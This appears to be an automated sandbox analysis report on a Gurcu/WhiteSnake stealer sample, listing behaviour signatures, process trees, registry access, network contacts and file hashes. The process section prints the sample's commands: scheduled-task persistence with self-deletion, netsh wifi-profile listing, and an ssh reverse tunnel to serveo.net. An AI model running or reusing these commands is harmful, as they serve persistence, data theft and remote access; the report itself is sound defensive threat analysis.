Malware Analysis Report

2024-10-19 06:42

Sample ID 231014-eb6r4aef4z
Target Vfd663501e1ac13eb331505b8388e675450.exe
SHA256 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5
Tags
gurcu collection spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5

Threat Level: Known bad

The file Vfd663501e1ac13eb331505b8388e675450.exe was found to be: Known bad.

Malicious Activity Summary

gurcu collection spyware stealer

Detect Gurcu Stealer V3 payload

Gurcu, WhiteSnake

Gurcu family

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

Reads user/profile data of web browsers

Deletes itself

Accesses Microsoft Outlook profiles

Looks up external IP address via web service

Enumerates physical storage devices

Unsigned PE

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

outlook_win_path

Runs ping.exe

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

outlook_office_path

Suspicious behavior: EnumeratesProcesses

Modifies system certificate store

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-14 03:47

Signatures

Detect Gurcu Stealer V3 payload

Description Indicator Process Target
N/A N/A N/A N/A

Gurcu family

gurcu

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-14 03:47

Reported

2023-10-14 19:53

Platform

win7-20230831-en

Max time kernel

152s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe"

Signatures

Detect Gurcu Stealer V3 payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gurcu, WhiteSnake

stealer gurcu

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1980 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\System32\cmd.exe
PID 1980 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\System32\cmd.exe
PID 1980 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\System32\cmd.exe
PID 2472 wrote to memory of 2624 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 2472 wrote to memory of 2624 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 2472 wrote to memory of 2624 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 2472 wrote to memory of 2664 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2472 wrote to memory of 2664 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2472 wrote to memory of 2664 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2472 wrote to memory of 2420 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2472 wrote to memory of 2420 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2472 wrote to memory of 2420 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2484 wrote to memory of 2980 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
PID 2484 wrote to memory of 2980 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
PID 2484 wrote to memory of 2980 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
PID 2472 wrote to memory of 1268 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
PID 2472 wrote to memory of 1268 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
PID 2472 wrote to memory of 1268 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
PID 2980 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 2980 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 2980 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 2040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1652 wrote to memory of 2040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1652 wrote to memory of 2040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1652 wrote to memory of 1152 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1652 wrote to memory of 1152 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1652 wrote to memory of 1152 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1652 wrote to memory of 2400 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 1652 wrote to memory of 2400 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 1652 wrote to memory of 2400 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2980 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 2980 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 2980 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 2364 wrote to memory of 2804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2364 wrote to memory of 2804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2364 wrote to memory of 2804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2364 wrote to memory of 800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2364 wrote to memory of 800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2364 wrote to memory of 800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2364 wrote to memory of 936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2364 wrote to memory of 936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2364 wrote to memory of 936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2980 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 2980 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 2980 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 2980 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe

"C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "Vfd663501e1ac13eb331505b8388e675450" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping 127.0.0.1

C:\Windows\system32\schtasks.exe

schtasks /create /tn "Vfd663501e1ac13eb331505b8388e675450" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe" /rl HIGHEST /f

C:\Windows\system32\taskeng.exe

taskeng.exe {A3823695-31D8-4472-9AEF-FFF4FF5F1648} S-1-5-21-3185155662-718608226-894467740-1000:YETUIZPU\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe"

C:\Windows\system32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Windows\system32\findstr.exe

findstr "SSID BSSID Signal"

C:\Windows\system32\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\chcp.com

chcp 65001

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7396 serveo.net

Network

Country Destination Domain Proto
N/A 127.0.0.1:7396 tcp
US 8.8.8.8:53 github.com udp
US 140.82.112.3:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp

Files

memory/1980-0-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp

memory/1980-1-0x0000000001030000-0x0000000001054000-memory.dmp

memory/1980-2-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp

memory/1980-3-0x000000001B940000-0x000000001B9C0000-memory.dmp

memory/1980-4-0x000000001B940000-0x000000001B9C0000-memory.dmp

memory/1980-7-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

MD5 35625d89730f70f12ecdeaf795722865
SHA1 0fedcad5039e3317d0e434bb038b81850e8f3599
SHA256 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5
SHA512 edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

MD5 35625d89730f70f12ecdeaf795722865
SHA1 0fedcad5039e3317d0e434bb038b81850e8f3599
SHA256 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5
SHA512 edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301

memory/2980-11-0x0000000000890000-0x00000000008B4000-memory.dmp

memory/2980-12-0x000007FEF4FF0000-0x000007FEF59DC000-memory.dmp

memory/2980-13-0x000000001ACE0000-0x000000001AD60000-memory.dmp

memory/2980-14-0x000007FEF4FF0000-0x000007FEF59DC000-memory.dmp

memory/2980-15-0x000000001ACE0000-0x000000001AD60000-memory.dmp

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

MD5 35625d89730f70f12ecdeaf795722865
SHA1 0fedcad5039e3317d0e434bb038b81850e8f3599
SHA256 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5
SHA512 edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301

memory/1268-18-0x000007FEF4FF0000-0x000007FEF59DC000-memory.dmp

memory/1268-19-0x000007FEF4FF0000-0x000007FEF59DC000-memory.dmp

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

MD5 d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1 011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA256 2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512 de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

MD5 d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1 011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA256 2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512 de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

MD5 79a6e2268dfdba1d94c27f4b17265ff4
SHA1 b17eed8cb6f454700f8bfcfd315d5627d3cf741c
SHA256 6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5
SHA512 3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

MD5 79a6e2268dfdba1d94c27f4b17265ff4
SHA1 b17eed8cb6f454700f8bfcfd315d5627d3cf741c
SHA256 6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5
SHA512 3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-14 03:47

Reported

2023-10-14 19:54

Platform

win10v2004-20230915-en

Max time kernel

114s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe"

Signatures

Detect Gurcu Stealer V3 payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gurcu, WhiteSnake

stealer gurcu

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2580 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\System32\cmd.exe
PID 2580 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\System32\cmd.exe
PID 4368 wrote to memory of 2268 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 4368 wrote to memory of 2268 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 4368 wrote to memory of 4724 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 4368 wrote to memory of 4724 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 4368 wrote to memory of 4552 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4368 wrote to memory of 4552 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4368 wrote to memory of 408 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
PID 4368 wrote to memory of 408 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
PID 408 wrote to memory of 5096 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\SYSTEM32\cmd.exe
PID 408 wrote to memory of 5096 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\SYSTEM32\cmd.exe
PID 5096 wrote to memory of 2628 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\chcp.com
PID 5096 wrote to memory of 2628 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\chcp.com
PID 5096 wrote to memory of 3432 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\netsh.exe
PID 5096 wrote to memory of 3432 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\netsh.exe
PID 5096 wrote to memory of 3212 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\findstr.exe
PID 5096 wrote to memory of 3212 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\findstr.exe
PID 408 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\SYSTEM32\cmd.exe
PID 408 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\SYSTEM32\cmd.exe
PID 3688 wrote to memory of 4952 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\chcp.com
PID 3688 wrote to memory of 4952 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\chcp.com
PID 3688 wrote to memory of 4940 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\netsh.exe
PID 3688 wrote to memory of 4940 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\netsh.exe
PID 3688 wrote to memory of 5084 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\findstr.exe
PID 3688 wrote to memory of 5084 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\findstr.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe

"C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "Vfd663501e1ac13eb331505b8388e675450" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping 127.0.0.1

C:\Windows\system32\schtasks.exe

